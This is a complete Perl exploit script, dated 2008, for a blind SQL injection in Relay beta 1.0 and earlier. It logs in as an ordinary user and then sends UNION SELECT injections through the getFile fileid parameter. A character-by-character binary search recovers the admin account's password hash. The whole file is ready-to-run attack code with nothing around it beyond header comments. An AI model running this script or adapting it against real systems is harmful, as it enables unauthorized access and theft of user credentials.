#!/usr/bin/perl
# Relay Blind SQL Injection Exploit
# Vulnerable Relay beta 1.0 and previous versions
# Made by MustLive (C) 2008
# http://websecurity.com.ua
# 03.05.2008
use LWP::UserAgent;

my $login = "user"; # login of user account
my $password = "pass"; # password of user account
my $user = "admin"; # login of account to attack
my $url = "http://site/relay/"; # path to Relay
my $chars = 32; # retrieve 32 symbols of password hash

my ($username,$hash,$requests);
my $ua = LWP::UserAgent->new;

$username = &User($user);
$url .= "relay.php";

&Usage;
if (&Login) {
	print "Looking for hash...\n\n";
	$hash = &Find($chars);
	print "\nLogin: $user\n";
	print "Password hash: $hash\n";
	print "Requests: $requests\n";
}
else {
	exit;
}

sub User {
	my $login = $_[0];
	my ($i,@username);

	for ($i=0;$i<length($login);$i++){
		push (@username,ord(substr($login,$i,1)));
	}
	return join(",",@username);
}

sub Login {
	my %fields = (
	'relay' => 'userLogin',
	'username' => $login,
	'password' => $password
	);
	my $res = $ua->post($url,[%fields]);

	if ($res->is_success) {
		return 1;
	}
	else {
		print "Error: " . $res->status_line . "\n";
		return 0;
	}
}

sub Find {
	my $count = $_[0];
	my ($i,$string);

	for ($i=1;$i<=$count;$i++) {
		$string .= chr(&Retrieve($i));
	}
	return $string;
}

sub Retrieve {
	my $char = $_[0];
	my $symbol;

	print "Checking char: $char\n";
	# checking symbols: 0-9 (48-57), a-f (97-102)
	if (&Check($char,">char(57)")) {
		$symbol = &RetrieveChar($char,97,102);
	}
	else {
		$symbol = &RetrieveChar($char,48,57);
	}
	return $symbol;
}

sub RetrieveChar {
	my $char = $_[0];
	my $from = $_[1];
	my $to = $_[2];
	my ($middle,$symbol,$found);
	
	while (!$found) {
		if ($from == $to) {
			$symbol = $to;
			$found = 1;
		}
		$middle = int(($from+$to)/2);
		if (&Check($char,">char($middle)")) {
			$from = $middle+1;
		}
		else {
			$to = $middle;
		}
	}
	return $symbol;
}

sub Check {
	my $char = $_[0];
	my $condition = $_[1];
	my $sql = "$url?relay=getFile&fileid=1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20relay_users%20where%20username=char($username)%20and%20substring(password,$char,1)$condition";
	my $res = $ua->get($sql);

	$requests++;
	if ($res->is_success) {
		if ($res->content =~ /access denied/) {
			return 1;
		}
		else {
			return 0;
		}
	}
	else {
		print "Error: " . $res->status_line . "\n";
		exit;
	}
}

sub Usage {
	print qq~
Relay Blind SQL Injection Exploit
Vulnerable Relay beta 1.0 and previous verions
Made by MustLive (C) 2008
http://websecurity.com.ua

~;
}